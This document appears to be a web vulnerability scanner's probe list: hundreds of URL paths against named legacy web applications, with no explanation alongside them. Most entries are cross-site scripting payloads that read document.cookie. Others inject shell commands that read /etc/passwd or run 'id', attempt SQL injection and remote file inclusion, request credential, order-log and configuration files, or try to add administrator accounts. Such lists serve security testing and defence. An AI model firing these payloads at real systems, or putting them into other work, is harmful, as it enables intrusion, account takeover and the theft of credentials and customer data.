+https-admserv/bin/index?/<script>alert(document.cookie)</script> +clusterframe.jsp?cluster=<script>alert(document.cookie)</script> +article.cfm?id=1'<script>alert(document.cookie);</script> +upload.php?type=\"<script>alert(document.cookie)</script> +soinfo.php?\"><script>alert('Vulnerable')</script> +modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>; +modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> +modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+> +webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef +addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> +666%0a%0a<script>alert('Vulnerable');</script>666.jsp +servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> +servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> +<script>alert('Vulnerable')</script>.shtm +<script>alert('Vulnerable')</script>.stm +admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur +SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> +_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> +nosuchurl/><script>alert('Vulnerable')</script> +test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x +test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x +cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E 
+search/results.stm?query=<script>alert('vulnerable');</script> +webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> +cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> +cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> +cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; +cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> +cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E +cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script> +cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> +cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script> +cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E +cgi-bin/myguestbook.cgi?action=view +cgi-bin/login.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT> +cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E +cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> +cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable +cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script> +cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +cgi-bin/diagnose.cgi +cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> +cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> +cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; +cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= +cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' +cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> 
+cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> +~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null +~/<script>alert('Vulnerable')</script>.aspx +~/<script>alert('Vulnerable')</script>.asp +z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825& +catinfo?<u><b>TESTING +webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +webamil/test.php +users.php?mode=profile&uid=<script>alert(document.cookie)</script> +usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) +user.php?op=userinfo&uname=<script>alert('hi');</script> +user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com +user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com +TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script> +templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> +templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> +supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script> +supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script> +supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script> +sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> +submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview +ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> +showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> +shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script> 
+setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P +servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> +servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> +servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> +search/index.cfm?<script>alert(\"Vulnerable\")</script> +search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script> +search.php?zoom_query=<script>alert(\"hello\")</script> +search.php?searchstring=<script>alert(document.cookie)</script> +search.php?searchfor=\"><script>alert('Vulnerable');</script> +search.asp?term=<%00script>alert('Vulnerable')</script> +script>alert('Vulnerable')</script>.cfm +samples/search.dll?query=<script>alert(document.cookie)</script> +replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> +profiles.php?uid=<script>alert(document.cookie)</script> +postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft +postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> +pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 +pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello +pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit +phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> +phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] +phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> +phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> 
+phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +phptonuke.php?filnavn=<script>alert('Vulnerable')</script> +phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E +phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> +phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> +phpimageview.php?pic=javascript:alert('Vulnerable') +phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> +phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> +phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> +phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> +phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> +pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 +pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> +openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> +openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> +node/view/666\"><script>alert(document.domain)</script> +netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> +nav/cList.php?root=</script><script>alert('Vulnerable')/<script> +myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= +myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= +myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent +myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent +myhome.php?action=messages&box=<script>alert('Vulnerable')</script> 
+msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> +msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> +msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> +modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> +modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> +modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 +modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 +modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| +modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> +modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> +modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> +modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test 
+modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> +modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> +modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> +modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index +members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 +megabook/admin.cgi?login=<script>alert('Vulnerable')</script> +mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> +mailman/listinfo/<script>alert('Vulnerable')</script> +ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> +launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> +launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> +jigsaw/ +isapi/testisa.dll?check1=<script>alert(document.cookie)</script> +index.php?top_message=<script>alert(document.cookie)</script> +index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> +index.php?catid=<script>alert('Vulnerable')</script> +index.php?action=storenew&username=<script>alert('Vulnerable')</script> +index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script +index.php/\"><script><script>alert(document.cookie)</script>< +index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> +index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu +include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script> +html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> +html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> 
+html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> +guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E +gallery/search.php?searchstring=<script>alert(document.cookie)</script> +friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> +forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 +forums/index.php?top_message=<script>alert(document.cookie)</script> +forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> +forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script> +esp?PAGE=<script>alert(document.cookie)</script> +error/500error.jsp?et=1<script>alert('Vulnerable')</script>; +downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\" +downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\" +downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\" +download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> +default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E +default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E +comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script> +comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview +cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> +cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< +chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> +cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> +cgi-bin/test2.pl?<script>alert('Vulnerable');</script> 
+cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E +calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 +ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> +ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f +bb000001.pl<script>alert('Vulnerable')</script> +article.php?sid=\"><Img +article.cfm?id=1'<script>alert(document.cookie);</script> +apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> +anthill/login.php +admin/login.php?path=\"></form><form +addressbook/index.php?surname=<script>alert('Vulnerable')</script> +addressbook/index.php?name=<script>alert('Vulnerable')</script> +add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> +a?<script>alert('Vulnerable')</script> +a.jsp/<script>alert('Vulnerable')</script> +?mod=<script>alert(document.cookie)</script>&op=browse +<script>alert('Vulnerable')</script>.thtml +<script>alert('Vulnerable')</script>.shtml +<script>alert('Vulnerable')</script>.jsp +<script>alert('Vulnerable')</script>.aspx +/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> +/comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> +<script>alert('Vulnerable');</script> +%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html +%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e +%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e +%22%3cscript%3ealert(%22xss%22)%3c/script%3e +%0a%0a<script>alert(\"Vulnerable\")</script>.jsp +cgi-bin/title.cgi +cgi-bin/compatible.cgi +add_user.php +cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer +cgi-bin/retrieve_password.pl +cgi-bin/wwwadmin.pl +cfdocs/expeval/displayopenedfile.cfm +cfdocs/expeval/sendmail.cfm +cgi-bin/bigconf.cgi +cgi-bin/webmap.cgi +cgi-bin/wwwwais +ammerum/ +ariadne/ +cbms/cbmsfoot.php +cbms/changepass.php 
+cbms/editclient.php +cbms/passgen.php +cbms/realinv.php +cbms/usersetup.php +cgi-bin/admin/admin.cgi +cgi-bin/admin/setup.cgi +cgi-bin/mt-static/mt-load.cgi +cgi-bin/mt-static/mt.cfg +cgi-bin/mt/mt-load.cgi +cgi-bin/mt/mt.cfg +cgi-bin-sdb/printenv +ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C +db/users.dat +cgi-bin/cgiwrap/~@USERS +cgi-bin/cgiwrap/~JUNK(5) +cgi-bin/cgiwrap/~root +cgi-bin/dbman/db.cgi?db=no-db +cgi-bin/dcshop/auth_data/auth_user_file.txt +cgi-bin/DCShop/auth_data/auth_user_file.txt +cgi-bin/dcshop/orders/orders.txt +cgi-bin/DCShop/orders/orders.txt +cgi-bin/dumpenv.pl +cgi-bin/htsearch?-c/nonexistant +cgi-bin/mkilog.exe +cgi-bin/mkplog.exe +cgi-bin/orders/orders.txt +cgi-bin/processit.pl +cgi-bin/rpm_query +cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 +cgi-bin/shop/auth_data/auth_user_file.txt +cgi-bin/shop/orders/orders.txt +cgi-bin/ws_ftp.ini +cgi-bin/WS_FTP.ini +?sql_debug=1 +a_security.htm +Admin_files/order.log +admin.html +admin/cplogfile.log +admin/system_footer.php +cfdocs/snippets/fileexists.cfm +cgi-bin/MachineInfo +chat/!nicks.txt +chat/!pwds.txt +chat/data/usr +com +COM +config.php +config/ +cplogfile.log +cutenews/index.php?debug +examples/jsp/snp/anything.snp +file-that-is-not-real-2002.php3 +index.php?sql_debug=1 +cgi-bin/view-source?view-source +cgi-bin/webplus?about +cfdocs/snippets/viewexample.cfm +chassis/config/GeneralChassisConfig.html +cgi-bin/ibill.pm +cgi-bin/scoadminreg.cgi +cgi-bin/SGB_DIR/superguestconfig +hp/device/this.LCDispatcher +cfdocs/snippets/evaluate.cfm +cfide/Administrator/startstop.html +cgi-bin/icat +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 +cgi-bin/query?mss=%2e%2e/config +cgi-bin/test-cgi?/* +cgi-bin/update.dpgs 
+cgi-bin/view-source +cgi-bin/wrap +Mem/dynaform/FileExplorer.htm +cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com +cgi-bin/lastlines.cgi?process +cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| +cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| +cgi-bin/campas?%0acat%0a/etc/passwd%0a +cgi-bin/cgicso?query=AAA +cgi-bin/cgiwrap +cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| +cgi-bin/Count.cgi +cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/echo.bat +cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/ImageFolio/admin/admin.cgi +cgi-bin/info2www +cgi-bin/info2www +cgi-bin/infosrch.cgi +cgi-bin/listrec.pl +cgi-bin/mailnews.cgi +cgi-bin/mmstdod.cgi +cgi-bin/pagelog.cgi +cgi-bin/perl?-v +cgi-bin/perl.exe?-v +cgi-bin/perl.exe +cgi-bin/perl +cgi-bin/plusmail +cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid +cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| +cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| +cgi-bin/spin_client.cgi?aaaaaaaa +cgi-bin/sscd_suncourier.pl +cgi-bin/viralator.cgi +cgi-bin/virgil.cgi +cgi-bin/vpasswd.cgi +cgi-bin/webgais +cgi-bin/websendmail +cgi-bin/whois.cgi?action=load&whois=%3Bid +cgi-bin/wwwwais +cd-cgi/sscd_suncourier.pl +cgi-bin/common/listrec.pl +cgi-bin/handler +cgi-bin/handler/netsonar;cat +cgi-bin/webdist.cgi +DB4Web/10.10.10.10:100 +ews/ews/architext_query.pl +exec/show/config/cr +instantwebmail/message.php +cfdocs/snippets/gettempdirectory.cfm +cgi-bin/stat.pl +cgi-bin/cachemgr.cgi 
+cgi-bin/ppdscgi.exe +cgi-bin/sws/admin.html +cgi-bin/webif.cgi +admin.php?en_log_id=0&action=config +admin.php?en_log_id=0&action=users +admin.php4?reg_login=1 +admin/admin_phpinfo.php4 +admin/login.php?action=insert&username=test&password=test +cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi +interscan/cgi-bin/FtpSave.dll?I'm%20Here +ext.ini.%00.txt +cgi-bin/webdriver +dostuff.php?action=modify_user +cgi-bin/c32web.exe/ChangeAdminPassword +accounts/getuserdesc.asp +cgi-bin/cgi-lib.pl +cgi-bin/log/nether-log.pl?checkit +cgi-bin/mini_logger.cgi +cgi-bin/mt-static/ +cgi-bin/mt/ +cgi-bin/nimages.php +cgi-bin/robadmin.cgi +Admin/ +cgi-bin/netpad.cgi +cgi-bin/troops.cgi +cgi-bin/unlg1.1 +cgi-bin/unlg1.2 +cgi-bin/rwwwshell.pl +cgi-bin/photo/manage.cgi +cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ +achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ +agentadmin.php +b2-include/b2edit.showposts.php +catalog/includes/include_once.php +errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ +sqldump.sql +structure.sql +servlet/SessionManager +php.ini +SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator +ip.txt +JUNK(6).cfm?mode=debug +level/42/exec/show%20conf +livehelp/ +LiveHelp/ +logicworks.ini +login.jsp +logins.html +logs/str_err.log +mall_log_files/order.log +mambo/administrator/phpinfo.php +megabook/files/20/setup.db +modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/* +modules.php?name=Members_List&sql_debug=1 +myinvoicer/config.inc +officescan/hotdownload/ofscan.ini +order/order_log_v12.dat +order/order_log.dat +orders/order_log_v12.dat +Orders/order_log_v12.dat +orders/order_log.dat +Orders/order_log.dat +PDG_Cart/shopper.conf +phorum/admin/stats.php +php-coolfile/action.php?action=edit&file=config.php +phpBB/phpinfo.php +phpinfo.php +phpinfo.php3 +pmlite.php +session/admnlogin +settings/site.ini +SiteScope/htdocs/SiteScope.html +soapdocs/ReleaseNotes.html 
+ssdefs/siteseed.dtd +servlet/allaire.jrun.ssi.SSIFilter +pp.php?action=login +isapi/count.pl? +krysalis/ +logjam/showhits.php +manual.php +mods/apage/apage.cgi?f=file.htm.|id| +modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +perl/-e%20%22system('cat%20/etc/passwd');\%22 +phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +Program%20Files/ +smssend.php +pls/simpledad/admin_/dadentries.htm +Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000 +ncl_items.html +ncl_items.shtml?SUBJECT=1 +photo/manage.cgi +photodata/manage.cgi +php-coolfile/action.php?action=edit&file=config.php +pub/english.cgi?op=rmail +pvote/ch_info.php?newpass=password&confirm=password%20 +scripts/wsisa.dll/WService=anything?WSMadmin +SetSecurity.shm +submit?setoption=q&option=allowed_ips&value=255.255.255.255 +thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin +servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a +shopadmin.asp +modsecurity.php +phpBB2/includes/db.php +<script>alert('Vulnerable')</script> +_vti_bin/shtml.exe/junk_nonexistant.exe +_vti_txt/_vti_cnf/ +_vti_txt/ +_vti_pvt/deptodoc.btr +_vti_pvt/doctodep.btr +_vti_pvt/services.org +_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 +_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 +_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude 
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude +_vti_bin/_vti_aut/dvwssr.dll +_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +_vti_bin/_vti_aut/fp30reg.dll +_vti_pvt/access.cnf +_vti_pvt/botinfs.cnf +_vti_pvt/bots.cnf +_vti_pvt/service.cnf +_vti_pvt/services.cnf +_vti_pvt/svacl.cnf +_vti_pvt/writeto.cnf +_vti_pvt/linkinfo.cnf +admin/ +isx.html +// +cgi-bin/blog/mt-check.cgi +mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; +mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com +mailman/listinfo +doc/ +doc +webalizer/ +web/ +usage/ +sitemap.xml +phpshare/phpshare.php +photo_album/apa_phpinclude.inc.php +cgis/wwwboard/wwwboard.cgi +cgis/wwwboard/wwwboard.pl +affich.php?image=<script>alert(document.cookie)</script> +diapo.php?rep=<script>alert(document.cookie)</script> +index.php?rep=<script>alert(document.cookie)</script> +admin/contextAdmin/contextAdmin.html +fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> +blahb.ida +blahb.idq +ab2/\@AdminViewError +.DS_Store +.FBCIndex +\"><img%20src=\"javascript:alert(document.domain)\"> +Survey/Survey.Htm +WEBAGENT/CQMGSERV/CF-SINFO.TPF +ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar +ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> +apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script> +ba4.nsf +BACLIENT +postinfo.html +na_admin/ataglance.html +scripts/samples/search/qfullhit.htw 
